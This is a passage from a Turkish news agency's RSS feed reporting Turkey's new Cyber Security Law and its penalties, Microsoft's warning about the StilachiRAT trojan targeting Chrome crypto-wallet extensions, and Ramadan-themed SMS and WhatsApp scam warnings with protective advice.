<p data-start="2201" data-end="2476" class=""><strong data-start="2201" data-end="2246">Uzmanlardan şirketlere acil önlem çağrısı</strong><br data-start="2246" data-end="2249">Olası tehditlere karşı, şirketlerin acilen şifrelerini güncellemeleri ve güçlü, karmaşık şifreler tercih etmeleri tavsiye ediliyor. Ek olarak, çok faktörlü kimlik doğrulama (MFA) sistemlerinin aktif hale getirilmesi öneriliyor.</p>
<p data-start="2478" data-end="2649" class=""><strong data-start="2478" data-end="2490"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Yalan Veri Sızıntısı İddiası Yayanlara 5 Yıl Hapis Cezası Verilecek</title>
            <link>https://cumha.com.tr/yalan-veri-sizintisi-iddiasi-yayanlara-5-yil-hapis-cezasi-verilecek</link>
            <guid>https://cumha.com.tr/yalan-veri-sizintisi-iddiasi-yayanlara-5-yil-hapis-cezasi-verilecek</guid>
            <description><![CDATA[ TBMM’de kabul edilen yeni Siber Güvenlik Kanunu, yalan veri sızıntısı iddiaları yayanlara 2 yıldan 5 yıla kadar hapis cezası getirecek. Sosyal medyada gerçeğe aykırı içerik paylaşanlar, ciddi cezalarla karşı karşıya kalacak. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67dd55bef1250.webp" length="38396" type="image/webp"/>
            
            <pubDate>Fri, 21 Mar 2025 15:05:50 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Yalan veri sızıntısı iddialarına kimler cezalandırılacak, Siber Güvenlik Kanunu’na göre veri sızıntısı olanlara hangi cezalar verilecek, Yalan veri sızıntısı iddiaları halkı nasıl etkiliyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="330" data-end="691">Türkiye Büyük Millet Meclisi (TBMM) tarafından kabul edilerek yasalaşan Siber Güvenlik Kanunu ile, siber güvenlik ve veri sızıntılarına yönelik cezalar sıkılaştırılıyor. Yeni yasa kapsamında, veri sızıntısı yapanlara 15 yıl hapis cezası verilmesi öngörülürken, daha önce sızdırılmış veriyi paylaşanlara ise 5 yıl hapis cezası uygulanacak.</p>
<p data-start="693" data-end="1237"><strong data-start="693" data-end="737">Yalan Veri Sızıntısı İddialarına Cezalar</strong><br data-start="737" data-end="740">Kanunun dikkat çeken bir başka maddesi, veri sızıntısı olmadığını bildiği halde yalan veri sızıntısı iddiaları yayanlara yönelik. Bu iddialar, özellikle sosyal medyada sıkça karşılaşılan ve kamuoyunu paniğe sürükleyen bir konu haline gelmişti. Yasanın belirlediği kurallara göre, veri sızıntısı olmadığı halde bir kurumu hedef göstermek ya da halk arasında korku ve endişe yaratmak amacıyla gerçeğe aykırı veri sızıntısı iddiaları ortaya atanlara 2 yıl ile 5 yıl arasında hapis cezası verilecek.</p>
<p data-start="1239" data-end="1685">Yeni düzenleme, özellikle sosyal medya kullanıcılarını ve internet ortamında faaliyet gösterenleri yakından ilgilendiriyor. Daha önce birçok kurum, kamu kurumu ve özel sektöre ait şirketlerle ilgili veri sızıntısı iddiaları, büyük yankı uyandırmış ve bazı iddialar resmi açıklamalarla yalanlanmıştı. Bu tür iddiaların yalan olduğunun ortaya çıkması durumunda yalanı yayarak halkı paniğe sevk edenler, ciddi cezai yaptırımlarla karşılaşabilecek.</p>
<p data-start="1687" data-end="2043"><strong data-start="1687" data-end="1724">Veri Sızıntısı İddialarına Dikkat</strong><br data-start="1724" data-end="1727">Yalan veri sızıntısı iddialarının yayılmasını engellemek ve kamu düzenini korumak amacıyla yeni yasalar, internetin ve sosyal medyanın etkili bir şekilde denetimini amaçlıyor. Ayrıca vatandaşların bu tür iddialara itibar etmeden önce dikkatli olmaları ve resmi açıklamaları dikkate almaları gerektiği vurgulanıyor.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Siber Güvenlik Kanunu TBMM'den Geçti: Türkiye'nin Veri Güvenliği İçin Yeni Dönem Başlıyor</title>
            <link>https://cumha.com.tr/siber-guvenlik-kanunu-tbmmden-gecti-turkiyenin-veri-guvenligi-icin-yeni-doenem-basliyor</link>
            <guid>https://cumha.com.tr/siber-guvenlik-kanunu-tbmmden-gecti-turkiyenin-veri-guvenligi-icin-yeni-doenem-basliyor</guid>
            <description><![CDATA[ Siber Güvenlik Kanunu, Türkiye’nin dijital altyapısını korumak amacıyla önemli düzenlemeler getiriyor. Yeni kanunla birlikte Siber Güvenlik Başkanlığı ve Kurulu oluşturulacak, yerli ürünler tercih edilecek ve çeşitli cezai yaptırımlar uygulanacak. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67dd53b0c4b0c.webp" length="53312" type="image/webp"/>
            
            <pubDate>Fri, 21 Mar 2025 14:55:38 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Türkiye’de Siber Güvenlik Kanunu ile getirilen yenilikler nelerdir, Siber Güvenlik Başkanlığı’nın görevleri neler, Siber Güvenlik Kanunu dijital şirketlere nasıl sorumluluklar yükleyecek, Siber güvenlik ihlali yapanlara uygulanacak cezalar nedir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="381" data-end="384"><strong data-start="384" data-end="424">Siber Güvenlik Kanunu TBMM'den geçti</strong><br data-start="424" data-end="427">Türkiye’nin veri güvenliğini güçlendirmek amacıyla hazırlanan Siber Güvenlik Kanunu, TBMM Genel Kurulunda kabul edilerek yasalaştı. Kanun, dijital ortamda faaliyet gösteren tüm kamu ve özel sektör kuruluşlarını kapsıyor. Kanun, Türkiye’nin siber dünyadaki milli gücünü oluşturacak ve dışarıdan gelen tehditlerle mücadele edecek düzenlemeleri hayata geçiriyor.</p>
<p></p>
<p data-start="790" data-end="1179"><strong data-start="790" data-end="837">Siber Güvenlik Kurulu ve Başkanlığının Rolü</strong><br data-start="837" data-end="840">Kanunla birlikte Siber Güvenlik Başkanlığı kurularak, başkanlığın yetkileri netleştirildi. Siber Güvenlik Kurulu da, Türkiye'nin siber güvenliğini güçlendirmek adına strateji ve politika belirlemekle sorumlu olacak. Başkanlık, ayrıca kritik altyapılara yönelik risk analizleri yapacak ve siber saldırılara karşı korunma önlemleri alacak.</p>
<p data-start="1181" data-end="1444"><strong data-start="1181" data-end="1223">Yerli ve Milli Ürünler Tercih Edilecek</strong><br data-start="1223" data-end="1226">Siber güvenlik önlemleri için yerli ve milli ürünlerin kullanımı ön planda tutulacak. Kamu kurumları ve özel sektör şirketleri, siber güvenlik stratejileri doğrultusunda tüm dijital süreçlerini denetim altına alacak.</p>
<p data-start="1446" data-end="1838"><strong data-start="1446" data-end="1479">Yeni Yükümlülükler ve Cezalar</strong><br data-start="1479" data-end="1482">Siber güvenlik yükümlülükleri, dijital ortamda faaliyet gösteren tüm şirketleri kapsıyor. Kanunla birlikte, siber güvenlik önlemlerine uymayan şirketlere 10 milyon TL'ye kadar para cezası kesilecek. Ayrıca, siber saldırı gerçekleştirenlere 15 yıla kadar hapis cezası uygulanacak. Yalan veri sızıntısı paylaşanlara ise 5 yıla kadar hapis cezası verilecek.</p>
<p data-start="1840" data-end="2104"><strong data-start="1840" data-end="1880">Siber Olaylara Müdahale Ekibi (SOME)</strong><br data-start="1880" data-end="1883">SOME, siber güvenlik krizlerine hızlı bir şekilde müdahale etmek amacıyla kurulacak. Bu ekip, siber saldırıları tespit edip etkilerini azaltmak için çalışacak. Ayrıca, uluslararası siber güvenlik işbirlikleri kurulacak.</p>
<p data-start="2106" data-end="2393"><strong data-start="2106" data-end="2157">Siber Güvenlik Başkanlığı'nın Denetim Yetkileri</strong><br data-start="2157" data-end="2160">Siber Güvenlik Başkanlığı, siber güvenlik alanındaki tüm yazılımları ve hizmetleri denetleyerek, bu alandaki standartları belirleyecek. Ayrıca, bilişim sistemlerindeki log kayıtlarını inceleyerek, olası siber suçları tespit edecek.</p>
<p data-start="2395" data-end="2680"><strong data-start="2395" data-end="2438">Dijital Şirketlerin Yeni Sorumlulukları</strong><br data-start="2438" data-end="2441">Siber güvenlik kanunu, dijital alanda faaliyet gösteren şirketlerin sorumluluklarını artırıyor. Şirketler, tespit ettikleri güvenlik zafiyetlerini derhal bildirmek zorunda olacak ve tüm siber güvenlik tedbirlerini almakla yükümlü olacak.</p>
<p data-start="2682" data-end="2942"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Veri Sızdıranlara 15, Paylaşanlara 5 Yıl Hapis Cezası Geliyor</title>
            <link>https://cumha.com.tr/veri-sizdiranlara-15-paylasanlara-5-yil-hapis-cezasi-geliyor</link>
            <guid>https://cumha.com.tr/veri-sizdiranlara-15-paylasanlara-5-yil-hapis-cezasi-geliyor</guid>
            <description><![CDATA[ Bugün TBMM&#039;de kabul edilen Siber Güvenlik Kanunu&#039;na göre, kişisel verileri sızdıranlara 15 yıl, sızmış veriyi paylaşanlara ise 5 yıl hapis cezası verilecek. Ceza miktarı, suçun işleniş şekline göre artabilecek. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67dd53393c9a5.webp" length="52262" type="image/webp"/>
            
            <pubDate>Fri, 21 Mar 2025 14:53:34 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Veri sızdıranlar için hapis cezası ne kadar olacak, Siber Güvenlik Kanunu&#039;nda hangi yeni düzenlemeler yer alıyor, Sızan veriyi paylaşanlara ne kadar ceza verilecek</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="324" data-end="327"><strong data-start="327" data-end="374">Siber Güvenlik Kanunu ile Yeni Düzenlemeler</strong><br data-start="374" data-end="377">Türkiye Büyük Millet Meclisi'nde kabul edilen yeni Siber Güvenlik Kanunu ile, kişisel veri sızıntıları ve bu verilerin paylaşılması konusunda ciddi cezalar getirildi. Yeni düzenlemeye göre, siber saldırı sonucunda kişisel verileri ele geçirenler ve bu verileri yaymak, başka bir yere göndermek veya satışa çıkarmak isteyenler 10 yıldan 15 yıla kadar hapis cezası alabilecek.</p>
<p></p>
<p data-start="753" data-end="1068"><strong data-start="753" data-end="789">Veri Sızdıranlara Yüksek Cezalar</strong><br data-start="789" data-end="792">Kanuna göre, siber saldırı ile verileri ele geçirenlere 8 ile 12 yıl arasında hapis cezası verilecek. Ancak, bu suçun bir örgüt tarafından işlenmesi durumunda ceza iki katına kadar artacak ve örgüt üyesi siber saldırganlar 30 yıla kadar hapis cezası ile karşı karşıya kalacak.</p>
<p data-start="1070" data-end="1491"><strong data-start="1070" data-end="1107">Sızan Veriyi Paylaşana 5 Yıl Ceza</strong><br data-start="1107" data-end="1110">Daha önce sızdırılmış verileri internette paylaşanlara da hapis cezası uygulanacak. Bu durumda, kişisel ya da kritik kamu hizmeti verileri izinsiz şekilde paylaşan kişilere 3 yıldan 5 yıla kadar hapis cezası verilebilecek. Ayrıca, çeşitli kurumların veritabanlarından ele geçirilen verileri "panel" adı verilen sistemlerle paylaşanlara da 5 yıla kadar hapis cezası uygulanabilecek.</p>
<p data-start="1493" data-end="1673"><strong data-start="1493" data-end="1505"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Google Chrome’da Kripto Para Cüzdanlarını Hedef Alan Truva Atı Tespit Edildi!</title>
            <link>https://cumha.com.tr/google-chromeda-kripto-para-cuzdanlarini-hedef-alan-truva-ati-tespit-edildi</link>
            <guid>https://cumha.com.tr/google-chromeda-kripto-para-cuzdanlarini-hedef-alan-truva-ati-tespit-edildi</guid>
            <description><![CDATA[ Microsoft tarafından yapılan açıklamaya göre, Google Chrome tarayıcısında kripto para cüzdanlarını hedef alan StilachiRAT adlı zararlı yazılım tespit edildi. Yatırımcılar büyük risk altında. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67dd3d9c5c856.webp" length="49418" type="image/webp"/>
            
            <pubDate>Fri, 21 Mar 2025 13:21:23 +0300</pubDate>
            <dc:creator>Cansu Kırten</dc:creator>
            <media:keywords>StilachiRAT zararlı yazılımı nasıl çalışıyor, kripto para cüzdanları tarayıcıda mı daha güvenlidir, Microsoft’tan yapılan uyarıların önemi nedir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="318" data-end="356"><strong data-start="318" data-end="356">Yeni Tehdit: StilachiRAT Truva Atı</strong></p>
<p data-start="358" data-end="850">Microsoft, Google Chrome kullanıcılarını hedef alan yeni bir zararlı yazılımın keşfedildiğini duyurdu. StilachiRAT adlı truva atı, özellikle kripto para cüzdanlarını hedef alıyor. MetaMask, TrustWallet, OKX ve OKX Wallet gibi popüler cüzdanlar, bu yazılımın ana hedeflerinden biri. Kullanıcıların şifrelerini, anahtar kelimelerini ve cüzdan bilgilerini çalmayı amaçlayan bu zararlı yazılım, Chrome tarayıcısındaki cüzdan bilgilerini sızdırarak saldırganların eline geçmesine olanak sağlıyor.</p>
<p data-start="852" data-end="884"><strong data-start="852" data-end="884">Saldırı Yöntemi ve Sonuçları</strong></p>
<p data-start="886" data-end="1152">StilachiRAT, bir kez sisteme sızdıktan sonra tarayıcıda kayıtlı olan cüzdan bilgilerini araştırır ve bunları bilinmeyen bir merkezi sisteme gönderir. Bu şekilde, kullanıcıların kripto para hesapları ele geçirilebilir ve yatırımcılar ciddi maddi kayıplar yaşayabilir.</p>
<p data-start="1154" data-end="1222"><strong data-start="1154" data-end="1222">Microsoft’tan Uyarı: Kripto Para Cüzdanlarını Donanımda Saklayın</strong></p>
<p data-start="1224" data-end="1660">Microsoft, bu tehditten korunmak için kullanıcıları uyardı ve güçlü bir anti-virüs yazılımı kullanmalarını önerdi. Bunun yanı sıra, kripto para cüzdanlarını tarayıcıda değil, donanım cüzdanlarında (hardware wallet) saklamanın daha güvenli olacağı vurgulandı. Bu uyarı, özellikle son dönemde artan kripto para hırsızlıkları ve dolandırıcılıkları nedeniyle kullanıcıların güvenlik konusunda daha dikkatli olmaları gerektiğini gösteriyor.</p>
<p data-start="1662" data-end="1689"><strong data-start="1662" data-end="1689">Güvenli Olmanın Yolları</strong></p>
<p data-start="1691" data-end="1954">Kripto para kullanıcıları için güvenliği artırmanın en etkili yollarından biri şüpheli bağlantılardan kaçınmak, güvenilir güvenlik yazılımlarını kullanmak ve cüzdan bilgilerini çevrimdışı saklamaktır. Bu tedbirler, saldırılara karşı daha güçlü bir korunma sağlar.</p>
<p data-start="1956" data-end="2115"><strong data-start="1956" data-end="1968"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Siber Güvenlik Kanunu Yürürlüğe Girerek Türkiye'nin Güvenliğini Artırmayı Hedefliyor</title>
            <link>https://cumha.com.tr/siber-guvenlik-kanunu-yururluge-girerek-turkiyenin-guvenligini-artirmayi-hedefliyor</link>
            <guid>https://cumha.com.tr/siber-guvenlik-kanunu-yururluge-girerek-turkiyenin-guvenligini-artirmayi-hedefliyor</guid>
            <description><![CDATA[ Türkiye&#039;de siber güvenliği güçlendirecek olan yeni yasa, siber tehditlere karşı yerli çözümleri önceliklendirecek. Ayrıca, kanunla birlikte ağır cezalar ve denetim yükümlülükleri de getiriliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67dc0eef3f62a.webp" length="36956" type="image/webp"/>
            
            <pubDate>Thu, 20 Mar 2025 15:49:56 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Yeni Siber Güvenlik Kanunu ne zaman yürürlüğe girdi, Siber Güvenlik Kanunu’nun amacı nedir, Siber Güvenlik Kurulu kimlerden oluşacak, Yasa ile getirilen cezalar nelerdir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="333" data-end="336"><strong data-start="336" data-end="388">Siber Güvenlik Kanunu Resmi Gazete’de yayımlandı</strong><br data-start="388" data-end="391">Türkiye’de siber güvenliği daha etkin hale getirmek amacıyla hazırlanan Siber Güvenlik Kanunu, Resmi Gazete’de yayımlanarak yürürlüğe girdi. 12 Mart’ta TBMM Genel Kurulu’nda kabul edilen yasa, Türkiye’nin siber tehditlere karşı daha güçlü bir savunma mekanizmasına sahip olmasını amaçlıyor. Kanun, özellikle yerli ve milli ürünlerin kullanılması gerektiğini vurguluyor ve kişisel verilerin korunması ile ticari sırların güvenliğini de sağlamayı hedefliyor.</p>
<p></p>
<p data-start="850" data-end="1205"><strong data-start="850" data-end="898">Yerli Ürünler ve Kişisel Verilerin Korunması</strong><br data-start="898" data-end="901">Kanuna göre, siber güvenlik önlemleri kapsamında elde edilen kişisel veriler ve ticari sırlar, erişim ihtiyacı ortadan kalktığında resen silinecek, anonim hale getirilecek ya da yok edilecek. Bu süreçler için detaylı düzenlemeler, Cumhurbaşkanlığı tarafından çıkarılacak bir yönetmelik ile belirlenecek.</p>
<p data-start="1207" data-end="1760"><strong data-start="1207" data-end="1242">Siber Güvenlik Kurulu Kuruluyor</strong><br data-start="1242" data-end="1245">Kanun, aynı zamanda Siber Güvenlik Kurulu’nun oluşturulmasını öngörüyor. Kurul, Cumhurbaşkanı başkanlığında; Cumhurbaşkanı Yardımcısı, Adalet Bakanı, Dışişleri Bakanı, İçişleri Bakanı, Milli Savunma Bakanı, Sanayi ve Teknoloji Bakanı, Ulaştırma ve Altyapı Bakanı, Milli Güvenlik Kurulu Genel Sekreteri, Milli İstihbarat Teşkilatı Başkanı, Savunma Sanayii Başkanı ve Siber Güvenlik Başkanı'ndan oluşacak. Kurul, gerektiğinde uzmanları ve ilgili kurumları toplantılara davet edebilecek ve komisyonlar oluşturabilecek.</p>
<p data-start="1762" data-end="2278"><strong data-start="1762" data-end="1790">Ağır Ceza ve Yaptırımlar</strong><br data-start="1790" data-end="1793">Yeni yasa, siber saldırılara karşı da ağır cezalar öngörüyor. Siber saldırılar düzenleyen kişiler 8 yıldan 12 yıla kadar hapis cezası alacak. Verileri yayan, satan ya da gönderenler ise 10 yıldan 15 yıla kadar hapisle cezalandırılacak. Ayrıca, denetim görevlilerinin talep ettiği verileri paylaşmayanlara da 1 yıldan 3 yıla kadar hapis ve 500 ila 1500 gün arasında adli para cezası uygulanacak. Sır saklama yükümlülüğünü ihlal edenlere ise 4 yıldan 8 yıla kadar hapis cezası verilecek.</p>
<p data-start="2280" data-end="2468"><strong data-start="2280" data-end="2292"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Google Chrome kullanıcıları için kripto cüzdanlarını hedef alan yeni bir truva atı uyarısı</title>
            <link>https://cumha.com.tr/google-chrome-kullanicilari-icin-kripto-cuzdanlarini-hedef-alan-yeni-bir-truva-ati-uyarisi</link>
            <guid>https://cumha.com.tr/google-chrome-kullanicilari-icin-kripto-cuzdanlarini-hedef-alan-yeni-bir-truva-ati-uyarisi</guid>
            <description><![CDATA[ Microsoft güvenlik raporuna göre, StilachiRAT adlı truva atı, Google Chrome tarayıcılarındaki kripto cüzdan eklentilerini hedef alarak kullanıcıların kritik bilgilerini çalabiliyor. Yetkililer, anti-virüs kullanımı konusunda uyarıda bulundu. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67dc0bed546ad.webp" length="25026" type="image/webp"/>
            
            <pubDate>Thu, 20 Mar 2025 15:37:14 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>StilachiRAT truva atı nedir, Google Chrome kullanıcıları bu tehditten nasıl korunabilir, Hangi kripto cüzdanları StilachiRAT tarafından hedef alınıyor, Microsoft&#039;un güvenlik uyarısının önemi nedir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="372" data-end="375"><strong data-start="375" data-end="416">Google Chrome kullanıcıları tehlikede</strong><br data-start="416" data-end="419">Son dönemde, siber saldırganlar, kripto para dünyasında güvenlik açıklarını artan bir şekilde hedef alıyor. Google Chrome kullanıcıları da bu tehditlerden nasibini aldı. Microsoft güvenlik ekibi tarafından yayımlanan bir rapora göre, StilachiRAT adlı bir truva atı, Google Chrome tarayıcısındaki kripto cüzdan eklentilerini hedef alarak kullanıcıların önemli bilgilerini çalmaya çalışıyor.</p>
<p></p>
<p data-start="811" data-end="1193"><strong data-start="811" data-end="839">Cüzdanlar hedef alınıyor</strong><br data-start="839" data-end="842">StilachiRAT, TrustWallet, OKX, MetaMask ve OKX Wallet gibi 20 farklı cüzdanı hedef alacak şekilde tasarlanmış. Kripto cüzdanlarını kullananlar, bu truva atı sayesinde, tarayıcılarındaki şifre ve anahtar kelimeler gibi kritik bilgileri kaybedebiliyor. Truva atı, bu bilgileri merkezi bir noktaya göndererek kullanıcıların cüzdanlarına erişim sağlıyor.</p>
<p data-start="1195" data-end="1427"><strong data-start="1195" data-end="1233">Kullanıcılar için güvenlik uyarısı</strong><br data-start="1233" data-end="1236">Microsoft, kullanıcıların bilgisayarlarını korumak için bir anti-virüs yazılımı kullanmalarını şiddetle tavsiye ediyor. Bu tür tehditlere karşı daha dikkatli olunması gerektiği vurgulanıyor.</p>
<p data-start="1429" data-end="1638"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Ramazan’da siber dolandırıcılık arttı: Sahte mesajlara dikkat!</title>
            <link>https://cumha.com.tr/ramazanda-siber-dolandiricilik-artti-sahte-mesajlara-dikkat</link>
            <guid>https://cumha.com.tr/ramazanda-siber-dolandiricilik-artti-sahte-mesajlara-dikkat</guid>
            <description><![CDATA[ Ramazan ayını fırsata çeviren siber dolandırıcılar, sahte yardım kampanyaları ve ödül mesajlarıyla vatandaşları hedef alıyor. Uzmanlar, özellikle SMS ve WhatsApp yoluyla gelen ‘Ramazan kolisi kazandınız’ veya ‘İftar rezervasyonunuz onaylandı’ gibi mesajlara karşı dikkatli olunması gerektiğini belirtiyor. Yardım yapılacak kişilerin ve kurumların mutlaka araştırılması gerektiği vurgulanıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67dc0038e4e9a.webp" length="45648" type="image/webp"/>
            
            <pubDate>Thu, 20 Mar 2025 14:47:10 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>Ramazan ayında siber dolandırıcılığın en yaygın yöntemleri nelerdir, sahte yardım kampanyalarından nasıl korunulur, iftar rezervasyonu dolandırıcılığı nasıl işliyor, hediye çeki mesajlarına neden dikkat edilmeli</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="515" data-end="743">Ramazan ayı, dolandırıcıların yeni tuzaklarıyla birlikte geldi. Siber dolandırıcılar, sosyal medya, SMS ve WhatsApp üzerinden vatandaşlara ulaşarak çeşitli yöntemlerle kişisel verilere ve banka hesaplarına erişmeyi hedefliyor.</p>
<p data-start="745" data-end="785"><strong data-start="745" data-end="783">Sahte yardım kampanyalarına dikkat</strong></p>
<p data-start="787" data-end="1247">Dolandırıcılar, Ramazan’ın manevi atmosferini suistimal ederek ‘zekât’, ‘fitre’ ve ‘Ramazan kolisi yardımı’ adı altında para talep ediyor. Kendilerini ihtiyaç sahibi gibi tanıtan kişiler, sahte hesaplar üzerinden yardım çağrıları yaparak vatandaşların iyi niyetini kullanıyor. Uzmanlar, sosyal medyada paylaşılan yardım kampanyalarının valilik izniyle düzenlenmesi gerektiğini ve bağış yapmadan önce iyi bir araştırma yapılmasının önemli olduğunu belirtiyor.</p>
<p data-start="1249" data-end="1686">Tüketici Konfederasyonu (TÜKONFED) Başkanı <strong data-start="1292" data-end="1309">Aydın Ağaoğlu</strong>, konuya ilişkin yaptığı açıklamada, “İyilik yapmak isteyen insanlar dolandırıcıların hedefi haline gelebiliyor. Bu kişiler sadece para talep etmekle kalmıyor, aynı zamanda kişisel verileri de ele geçirebiliyor. Yardım yapılacak kişi ve kuruluşlar mutlaka iyi araştırılmalı. En güvenilir yöntem, resmi kurumlar ve vakıflar aracılığıyla yardım yapmaktır” ifadelerini kullandı.</p>
<p data-start="1688" data-end="1736"><strong data-start="1688" data-end="1734">Sahte ödüller ve iftar rezervasyonu tuzağı</strong></p>
<p data-start="1738" data-end="2098">Dolandırıcılar, yalnızca yardım talepleriyle değil, aynı zamanda sahte ödüllerle de vatandaşları kandırmaya çalışıyor. ‘Ramazan paketi kazandınız’, ‘Hediye çeki kazandınız’ gibi mesajlar yoluyla zararlı linklere yönlendirme yapılıyor. Bu linklere tıklayan vatandaşların telefonlarına kötü amaçlı yazılımlar yüklenerek banka hesaplarına erişim sağlanabiliyor.</p>
<p data-start="2100" data-end="2498">Tüketiciler Birliği Genel Başkanı <strong data-start="2134" data-end="2150">Mahmut Şahin</strong>, bu tür dolandırıcılık yöntemlerine karşı uyarıda bulunarak, “Bedava peynir fare kapanında olur. Hiçbir kurum rastgele insanlara hediye çeki ya da yardım paketi dağıtmaz. Bu nedenle telefonunuza gelen linklere tıklamayın. Ayrıca, yardımlar yalnızca talep edenlere değil, gerçekten ihtiyacı olan ve talep etmeyen insanlara da ulaştırılmalı” dedi.</p>
<p data-start="2500" data-end="2848">Dolandırıcıların bir diğer yöntemi ise ‘iftar rezervasyonu’ tuzağı. ‘İftar rezervasyonunuz aktif edilmiştir’ şeklinde gelen mesajlarla, vatandaşların sahte linklere yönlendirilerek hesap bilgilerinin ele geçirilmesi hedefleniyor. Uzmanlar, Ramazan ayında artan bu tür dolandırıcılıklara karşı vatandaşların dikkatli olması gerektiğini vurguluyor.</p>
<p data-start="2850" data-end="3080"><strong data-start="2850" data-end="2862"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Ramazan Ayında Dolandırıcılara Dikkat: Yeni Tuzaklar Ortaya Çıktı</title>
            <link>https://cumha.com.tr/ramazan-ayinda-dolandiricilara-dikkat-yeni-tuzaklar-ortaya-cikti</link>
            <guid>https://cumha.com.tr/ramazan-ayinda-dolandiricilara-dikkat-yeni-tuzaklar-ortaya-cikti</guid>
            <description><![CDATA[ Ramazan ayında siber dolandırıcılar, vatandaşların manevi duygularını suistimal ederek çeşitli yöntemlerle kişisel bilgilere ve banka hesaplarına ulaşmaya çalışıyor. ‘Ramazan kolisi’, ‘iftar rezervasyonu’ ve ‘hediye çeki’ gibi mesajlarla insanları kandıran dolandırıcılara karşı uzmanlar uyarıda bulundu. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67da8cc9e817a.webp" length="14222" type="image/webp"/>
            
            <pubDate>Wed, 19 Mar 2025 12:22:22 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>Ramazan ayında dolandırıcılar hangi yöntemleri kullanıyor, iftar rezervasyonu tuzağı nasıl işliyor, dolandırıcılara karşı nasıl önlem alınmalı, yardım yapılırken nelere dikkat edilmeli</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="430" data-end="695">Ramazan ayı, dolandırıcıların yeni taktikler geliştirdiği bir dönem olmaya devam ediyor. Sosyal medya, SMS ve WhatsApp üzerinden yayılan sahte mesajlarla vatandaşlardan para toplayan siber dolandırıcılar, kişisel verilere ve banka hesaplarına ulaşmayı hedefliyor.</p>
<p data-start="697" data-end="739"><strong data-start="697" data-end="737">Dolandırıcılık Yöntemleri Çeşitlendi</strong></p>
<p data-start="741" data-end="1103">Siber dolandırıcılar, ‘Ramazan paketi kazandınız’, ‘iftar rezervasyonunuz aktif edilmiştir’ gibi mesajlar göndererek vatandaşları tuzağa çekmeye çalışıyor. Kendisini ihtiyaç sahibi gibi tanıtan sahte hesaplar aracılığıyla ‘zekat’, ‘fitre’ ve ‘Ramazan kolisi yardımı’ adı altında para talep eden kişiler, manevi duyguları istismar ederek dolandırıcılık yapıyor.</p>
<p data-start="1105" data-end="1404">Uzmanlar, özellikle telefonlara gelen bu tür mesajlardaki zararlı linklere tıklanması durumunda banka hesaplarının boşaltılabileceği ve kişisel verilerin ele geçirilebileceği konusunda uyarıyor. Yardım kampanyalarının yalnızca resmi izinli kuruluşlar aracılığıyla yapılması gerektiği vurgulanıyor.</p>
<p data-start="1406" data-end="1452"><strong data-start="1406" data-end="1450">‘Yardım Edilecek Kişi İyi Araştırılmalı’</strong></p>
<p data-start="1454" data-end="1620">Tüketici Konfederasyonu (TÜKONFED) Başkanı Aydın Ağaoğlu, Ramazan ayında iyilik yapmak isteyen vatandaşların dikkatli olması gerektiğini belirterek şunları söyledi:</p>
<p data-start="1622" data-end="1885"><em data-start="1622" data-end="1883">“İhtiyaç sahibi gibi kendini gösteren dolandırıcılar, iyiliksever insanların duygularını sömürüyor. Hem para koparıyorlar hem de kişisel verileri ele geçiriyorlar. Yardım edecek kişiler, bağışlarını resmi kurumlar, vakıflar ve dernekler aracılığıyla yapmalı.”</em></p>
<p data-start="1887" data-end="1923"><strong data-start="1887" data-end="1921">‘Bedava Peynir Fare Kapanında’</strong></p>
<p data-start="1925" data-end="2060">Tüketiciler Birliği Genel Başkanı Mahmut Şahin ise dolandırıcılık yöntemlerinin giderek arttığına dikkat çekerek, şu uyarıda bulundu:</p>
